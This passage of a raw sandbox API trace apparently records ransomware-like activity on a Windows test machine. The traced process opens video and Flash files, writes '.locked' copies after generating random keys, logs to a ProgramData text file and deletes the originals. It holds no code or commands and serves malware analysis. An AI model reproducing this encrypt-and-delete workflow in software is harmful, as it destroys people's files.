0x0 [0317.720] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x102 [0317.723] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0317.723] SetEvent (hEvent=0x20c) returned 1 [0317.724] SetEvent (hEvent=0x12c) returned 1 [0317.724] SetEvent (hEvent=0x1ac) returned 1 [0317.724] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0317.724] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33e2fb34, ulCount=0x10, ulNumEntriesRemoved=0x33e2fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33e2fb34, ulNumEntriesRemoved=0x33e2fb14) returned 0 [0317.724] SetEvent (hEvent=0x150) returned 1 [0317.724] SetEvent (hEvent=0x1ac) returned 1 [0317.724] SetEvent (hEvent=0x12c) returned 1 [0317.725] SetEvent (hEvent=0x220) returned 1 [0317.725] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0317.806] SetEvent (hEvent=0x1ac) returned 1 [0317.806] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0317.811] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0317.816] SetEvent (hEvent=0x20c) returned 1 [0317.816] SetEvent (hEvent=0x220) returned 1 [0317.816] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0317.835] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0317.865] SetEvent (hEvent=0x12c) returned 1 [0317.865] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0317.987] SetEvent (hEvent=0x198) returned 1 [0317.987] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x102 [0317.992] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0317.992] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x102 [0318.052] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0318.052] SetEvent (hEvent=0x198) returned 1 [0318.052] SetEvent (hEvent=0x1dc) returned 1 [0318.052] SetEvent (hEvent=0x1b8) returned 1 [0318.052] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0318.059] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33e2fb34, ulCount=0x10, ulNumEntriesRemoved=0x33e2fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33e2fb34, ulNumEntriesRemoved=0x33e2fb14) returned 0 [0318.059] SetEvent (hEvent=0x150) returned 1 [0318.059] SetEvent (hEvent=0x1dc) returned 1 [0318.059] SetEvent (hEvent=0x1b8) returned 1 [0318.059] SetEvent (hEvent=0x198) returned 1 [0318.059] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x125fc000*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x12633a24, lpReserved=0x0 | out: lpBuffer=0x125fc000*, lpNumberOfCharsWritten=0x12633a24*=0xc) returned 1 [0318.079] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\CUoTLa2sZ2sB3Af.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\cuotla2sz2sb3af.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x208 [0318.080] GetConsoleMode (in: hConsoleHandle=0x208, lpMode=0x12633d9c | out: lpMode=0x12633d9c) returned 0 [0318.081] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\CUoTLa2sZ2sB3Af.mp4.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\cuotla2sz2sb3af.mp4.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0318.602] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x12633d9c | out: lpMode=0x12633d9c) returned 0 [0318.602] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c200 | out: pbBuffer=0x1234c200) returned 1 [0318.602] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e060 | out: pbBuffer=0x1234e060) returned 1 [0318.603] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340401 | out: pbBuffer=0x12340401) returned 1 [0318.603] WriteFile (in: hFile=0x1e0, lpBuffer=0x126c3000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x12633d78, lpOverlapped=0x0 | out: lpBuffer=0x126c3000*, lpNumberOfBytesWritten=0x12633d78*=0x80, lpOverlapped=0x0) returned 1 [0318.605] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x0 [0318.606] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33e2fb30, ulCount=0x10, ulNumEntriesRemoved=0x33e2fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33e2fb30, ulNumEntriesRemoved=0x33e2fb10) returned 0 [0318.606] SetEvent (hEvent=0x22c) returned 1 [0318.606] SetEvent (hEvent=0x180) returned 1 [0318.606] ReadFile (in: hFile=0x208, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12633d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x12633d68*=0x2b52, lpOverlapped=0x0) returned 1 [0318.608] WriteFile (in: hFile=0x1e0, lpBuffer=0x12770000*, nNumberOfBytesToWrite=0x2b52, lpNumberOfBytesWritten=0x12633d74, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesWritten=0x12633d74*=0x2b52, lpOverlapped=0x0) returned 1 [0318.626] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0318.657] SetEvent (hEvent=0x184) returned 1 [0318.657] ReadFile (in: hFile=0x208, lpBuffer=0x12770000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x12633d68, lpOverlapped=0x0 | out: lpBuffer=0x12770000*, lpNumberOfBytesRead=0x12633d68*=0x0, lpOverlapped=0x0) returned 1 [0318.657] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0318.731] SetEvent (hEvent=0x150) returned 1 [0318.731] CloseHandle (hObject=0x1e0) returned 1 [0318.732] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0318.741] SetEvent (hEvent=0x150) returned 1 [0318.741] CloseHandle (hObject=0x208) returned 1 [0318.741] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0318.854] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1b0 [0318.855] GetConsoleMode (in: hConsoleHandle=0x1b0, lpMode=0x12633e94 | out: lpMode=0x12633e94) returned 0 [0318.855] WriteFile (in: hFile=0x1b0, lpBuffer=0x125740f0*, nNumberOfBytesToWrite=0x43, lpNumberOfBytesWritten=0x12633e64, lpOverlapped=0x0 | out: lpBuffer=0x125740f0*, lpNumberOfBytesWritten=0x12633e64*=0x43, lpOverlapped=0x0) returned 1 [0318.855] CloseHandle (hObject=0x1b0) returned 1 [0318.855] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\CUoTLa2sZ2sB3Af.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\cuotla2sz2sb3af.mp4")) returned 1 [0318.869] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0318.897] SetEvent (hEvent=0x1ac) returned 1 [0318.897] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0318.898] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0318.927] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c200*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x125e3a24, lpReserved=0x0 | out: lpBuffer=0x1234c200*, lpNumberOfCharsWritten=0x125e3a24*=0xc) returned 1 [0318.930] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\wDTVvpZ38Fq9891Oa2hg.mp4" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\wdtvvpz38fq9891oa2hg.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x240 [0318.930] GetConsoleMode (in: hConsoleHandle=0x240, lpMode=0x125e3d9c | out: lpMode=0x125e3d9c) returned 0 [0318.930] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Videos\\UQ6zmB-l2xOZ\\wDTVvpZ38Fq9891Oa2hg.mp4.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\videos\\uq6zmb-l2xoz\\wdtvvpz38fq9891oa2hg.mp4.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1e0 [0319.233] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0319.480] GetConsoleMode (in: hConsoleHandle=0x1e0, lpMode=0x125e3d9c | out: lpMode=0x125e3d9c) returned 0 [0319.480] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1234c2c0 | out: pbBuffer=0x1234c2c0) returned 1 [0319.480] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x127660b0 | out: pbBuffer=0x127660b0) returned 1 [0319.481] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c201 | out: pbBuffer=0x1237c201) returned 1 [0319.481] WriteFile (in: hFile=0x1e0, lpBuffer=0x16cd9000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125e3d78, lpOverlapped=0x0 | out: lpBuffer=0x16cd9000*, lpNumberOfBytesWritten=0x125e3d78*=0x80, lpOverlapped=0x0) returned 1 [0319.482] VirtualAlloc (lpAddress=0x19220000, dwSize=0x9d0000, flAllocationType=0x1000, flProtect=0x4) returned 0x19220000 [0319.519] VirtualAlloc (lpAddress=0x10980000, dwSize=0x9e000, flAllocationType=0x1000, flProtect=0x4) returned 0x10980000 [0319.522] VirtualAlloc (lpAddress=0x2173000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x2173000 [0319.697] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0x1) returned 0x0 [0319.699] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33e2fb30, ulCount=0x10, ulNumEntriesRemoved=0x33e2fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33e2fb30, ulNumEntriesRemoved=0x33e2fb10) returned 0 [0319.699] SetEvent (hEvent=0x150) returned 1 [0319.699] SetEvent (hEvent=0x1f0) returned 1 [0319.699] SetEvent (hEvent=0x214) returned 1 [0319.699] ReadFile (in: hFile=0x240, lpBuffer=0x19200000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e3d68, lpOverlapped=0x0 | out: lpBuffer=0x19200000*, lpNumberOfBytesRead=0x125e3d68*=0x46b7, lpOverlapped=0x0) returned 1 [0319.701] WriteFile (in: hFile=0x1e0, lpBuffer=0x19200000*, nNumberOfBytesToWrite=0x46b7, lpNumberOfBytesWritten=0x125e3d74, lpOverlapped=0x0 | out: lpBuffer=0x19200000*, lpNumberOfBytesWritten=0x125e3d74*=0x46b7, lpOverlapped=0x0) returned 1 [0320.117] ReadFile (in: hFile=0x240, lpBuffer=0x19200000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125e3d68, lpOverlapped=0x0 | out: lpBuffer=0x19200000*, lpNumberOfBytesRead=0x125e3d68*=0x0, lpOverlapped=0x0) returned 1 [0320.117] CloseHandle (hObject=0x1e0) returned 1 [0320.205] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0320.208] CloseHandle (hObject=0x240) returned 1 [0320.208] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0320.364] SwitchToThread () returned 1 [0320.368] SetEvent (hEvent=0x184) returned 1 [0320.368] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0320.370] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0320.834] SetEvent (hEvent=0x134) returned 1 [0320.834] SetEvent (hEvent=0x190) returned 1 [0320.834] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0320.841] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) returned 0x0 [0320.842] SetEvent (hEvent=0x12c) returned 1 [0320.842] WaitForSingleObject (hHandle=0x1e8, dwMilliseconds=0xffffffff) Thread: id = 445 os_tid = 0x8ec [0261.062] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x33f6ff58, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x33f6ff58*=0x210) returned 1 [0261.062] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x214 [0261.062] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0261.065] SetEvent (hEvent=0x1ac) returned 1 [0261.065] SetEvent (hEvent=0x104) returned 1 [0261.065] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0261.834] SetEvent (hEvent=0x21c) returned 1 [0261.834] SetEvent (hEvent=0x14c) returned 1 [0261.834] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0261.847] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0261.897] SetEvent (hEvent=0x1dc) returned 1 [0261.897] SetEvent (hEvent=0x190) returned 1 [0261.897] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0261.988] SetEvent (hEvent=0x1e8) returned 1 [0261.988] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0262.101] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0262.101] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0262.131] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0262.131] SetEvent (hEvent=0x104) returned 1 [0262.131] SetEvent (hEvent=0x1d0) returned 1 [0262.131] SetEvent (hEvent=0x1e8) returned 1 [0262.132] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0262.180] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb34, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb34, ulNumEntriesRemoved=0x33f6fb14) returned 0 [0262.181] SetEvent (hEvent=0x1d0) returned 1 [0262.181] SetEvent (hEvent=0x1e8) returned 1 [0262.181] SetEvent (hEvent=0x104) returned 1 [0262.311] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c240*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x125f7a24, lpReserved=0x0 | out: lpBuffer=0x1234c240*, lpNumberOfCharsWritten=0x125f7a24*=0xb) returned 1 [0262.415] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0263.067] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\QnyUe3Ugz.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\qnyue3ugz.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0263.067] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x125f7d9c | out: lpMode=0x125f7d9c) returned 0 [0263.067] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\QnyUe3Ugz.swf.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\qnyue3ugz.swf.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1c0 [0265.303] GetConsoleMode (in: hConsoleHandle=0x1c0, lpMode=0x125f7d9c | out: lpMode=0x125f7d9c) returned 0 [0265.303] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1263e0c0 | out: pbBuffer=0x1263e0c0) returned 1 [0265.303] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x1234e0c0 | out: pbBuffer=0x1234e0c0) returned 1 [0265.303] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12340501 | out: pbBuffer=0x12340501) returned 1 [0265.303] WriteFile (in: hFile=0x1c0, lpBuffer=0x12679000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x125f7d78, lpOverlapped=0x0 | out: lpBuffer=0x12679000*, lpNumberOfBytesWritten=0x125f7d78*=0x80, lpOverlapped=0x0) returned 1 [0265.304] VirtualAlloc (lpAddress=0x16cf0000, dwSize=0x9d0000, flAllocationType=0x1000, flProtect=0x4) returned 0x16cf0000 [0265.382] VirtualAlloc (lpAddress=0x10bd4000, dwSize=0x9c000, flAllocationType=0x1000, flProtect=0x4) returned 0x10bd4000 [0265.384] VirtualAlloc (lpAddress=0x216e000, dwSize=0x1000, flAllocationType=0x1000, flProtect=0x4) returned 0x216e000 [0265.395] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0265.444] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0265.444] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb30, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb10, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb30, ulNumEntriesRemoved=0x33f6fb10) returned 0 [0265.444] SetEvent (hEvent=0x150) returned 1 [0265.444] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x100000, lpStartAddress=0x44bd00, lpParameter=0x1266a6c0, dwCreationFlags=0x10000, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x204 [0265.444] CloseHandle (hObject=0x204) returned 1 [0265.445] SetEvent (hEvent=0x1dc) returned 1 [0265.445] SetEvent (hEvent=0x1e8) returned 1 [0265.445] ReadFile (in: hFile=0x1bc, lpBuffer=0x16cf0000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125f7d68, lpOverlapped=0x0 | out: lpBuffer=0x16cf0000*, lpNumberOfBytesRead=0x125f7d68*=0xbbe7, lpOverlapped=0x0) returned 1 [0265.568] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0266.039] WriteFile (in: hFile=0x1c0, lpBuffer=0x16cf0000*, nNumberOfBytesToWrite=0xbbe7, lpNumberOfBytesWritten=0x125f7d74, lpOverlapped=0x0 | out: lpBuffer=0x16cf0000*, lpNumberOfBytesWritten=0x125f7d74*=0xbbe7, lpOverlapped=0x0) returned 1 [0266.275] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0269.708] ReadFile (in: hFile=0x1bc, lpBuffer=0x16cf0000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x125f7d68, lpOverlapped=0x0 | out: lpBuffer=0x16cf0000*, lpNumberOfBytesRead=0x125f7d68*=0x0, lpOverlapped=0x0) returned 1 [0269.708] CloseHandle (hObject=0x1c0) returned 1 [0269.804] CloseHandle (hObject=0x1bc) returned 1 [0269.804] CreateFileW (lpFileName="C:\\ProgramData\\keEeR.txt" (normalized: "c:\\programdata\\keeer.txt"), dwDesiredAccess=0x80000004, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1bc [0269.804] GetConsoleMode (in: hConsoleHandle=0x1bc, lpMode=0x125f7e94 | out: lpMode=0x125f7e94) returned 0 [0269.804] WriteFile (in: hFile=0x1bc, lpBuffer=0x1264a140*, nNumberOfBytesToWrite=0x31, lpNumberOfBytesWritten=0x125f7e64, lpOverlapped=0x0 | out: lpBuffer=0x1264a140*, lpNumberOfBytesWritten=0x125f7e64*=0x31, lpOverlapped=0x0) returned 1 [0269.804] CloseHandle (hObject=0x1bc) returned 1 [0269.806] DeleteFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\QnyUe3Ugz.swf" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\qnyue3ugz.swf")) returned 1 [0270.203] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0270.231] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0270.259] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0270.925] SetEvent (hEvent=0x220) returned 1 [0270.925] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0272.913] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0272.913] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0x1) returned 0x102 [0272.934] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0272.934] SetEvent (hEvent=0x20c) returned 1 [0272.934] SetEvent (hEvent=0x14c) returned 1 [0272.934] SetEvent (hEvent=0x1d0) returned 1 [0272.934] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0272.943] GetQueuedCompletionStatusEx (in: CompletionPort=0x174, lpCompletionPortEntries=0x33f6fb34, ulCount=0x10, ulNumEntriesRemoved=0x33f6fb14, dwMilliseconds=0x0, fAlertable=0 | out: lpCompletionPortEntries=0x33f6fb34, ulNumEntriesRemoved=0x33f6fb14) returned 0 [0272.943] SetEvent (hEvent=0x150) returned 1 [0272.943] SetEvent (hEvent=0x14c) returned 1 [0272.943] SetEvent (hEvent=0x1d0) returned 1 [0272.943] SetEvent (hEvent=0x20c) returned 1 [0272.944] WriteFile (in: hFile=0x224, lpBuffer=0x14ff6000*, nNumberOfBytesToWrite=0xfa000, lpNumberOfBytesWritten=0x123a1e78, lpOverlapped=0x0 | out: lpBuffer=0x14ff6000*, lpNumberOfBytesWritten=0x123a1e78*=0xfa000, lpOverlapped=0x0) returned 1 [0273.172] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0273.489] CloseHandle (hObject=0x224) returned 1 [0273.659] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0273.822] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0273.846] SetEvent (hEvent=0x190) returned 1 [0273.847] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0274.018] WriteConsoleW (in: hConsoleOutput=0x3c, lpBuffer=0x1234c220*, nNumberOfCharsToWrite=0xb, lpNumberOfCharsWritten=0x1263ba24, lpReserved=0x0 | out: lpBuffer=0x1234c220*, lpNumberOfCharsWritten=0x1263ba24*=0xb) returned 1 [0274.023] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\C5Fa.mkv" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\c5fa.mkv"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x218 [0274.024] GetConsoleMode (in: hConsoleHandle=0x218, lpMode=0x1263bd9c | out: lpMode=0x1263bd9c) returned 0 [0274.024] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\C5Fa.mkv.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\c5fa.mkv.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x19c [0274.143] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0274.363] SetEvent (hEvent=0x1d0) returned 1 [0274.364] GetConsoleMode (in: hConsoleHandle=0x19c, lpMode=0x1263bd9c | out: lpMode=0x1263bd9c) returned 0 [0274.364] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0277.908] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0277.923] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0277.929] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0277.973] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\53CjZJnv.avi" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\53cjzjnv.avi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x180 [0277.974] GetConsoleMode (in: hConsoleHandle=0x180, lpMode=0x1249ed9c | out: lpMode=0x1249ed9c) returned 0 [0277.974] CreateFileW (lpFileName="C:\\\\Users\\RDhJ0CNFevzX\\Desktop\\yjUz3WLu\\b1s7y96Y6gVCDj\\53CjZJnv.avi.locked" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\yjuz3wlu\\b1s7y96y6gvcdj\\53cjzjnv.avi.locked"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x188 [0277.974] GetConsoleMode (in: hConsoleHandle=0x188, lpMode=0x1249ed9c | out: lpMode=0x1249ed9c) returned 0 [0277.975] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x12390000 | out: pbBuffer=0x12390000) returned 1 [0277.975] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x10, pbBuffer=0x12766030 | out: pbBuffer=0x12766030) returned 1 [0277.975] CryptGenRandom (in: hProv=0x8e3e08, dwLen=0x20, pbBuffer=0x1237c081 | out: pbBuffer=0x1237c081) returned 1 [0277.975] WriteFile (in: hFile=0x188, lpBuffer=0x1275e000*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x1265bd78, lpOverlapped=0x0 | out: lpBuffer=0x1275e000*, lpNumberOfBytesWritten=0x1265bd78*=0x80, lpOverlapped=0x0) returned 1 [0278.008] ReadFile (in: hFile=0x180, lpBuffer=0x170b8000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265bd68, lpOverlapped=0x0 | out: lpBuffer=0x170b8000*, lpNumberOfBytesRead=0x1265bd68*=0x3ce8, lpOverlapped=0x0) returned 1 [0278.010] WriteFile (in: hFile=0x188, lpBuffer=0x170b8000*, nNumberOfBytesToWrite=0x3ce8, lpNumberOfBytesWritten=0x1265bd74, lpOverlapped=0x0 | out: lpBuffer=0x170b8000*, lpNumberOfBytesWritten=0x1265bd74*=0x3ce8, lpOverlapped=0x0) returned 1 [0278.025] WaitForSingleObject (hHandle=0x214, dwMilliseconds=0xffffffff) returned 0x0 [0278.365] SetEvent (hEvent=0x150) returned 1 [0278.365] SetEvent (hEvent=0x1b8) returned 1 [0278.365] ReadFile (in: hFile=0x180, lpBuffer=0x170b8000, nNumberOfBytesToRead=0x9c4000, lpNumberOfBytesRead=0x1265bd68, lpOverlapped=0x0 | out: lpBuffer=0x170b8000*, lpNumberOfBytesRead=0x1265bd68*=0x0, 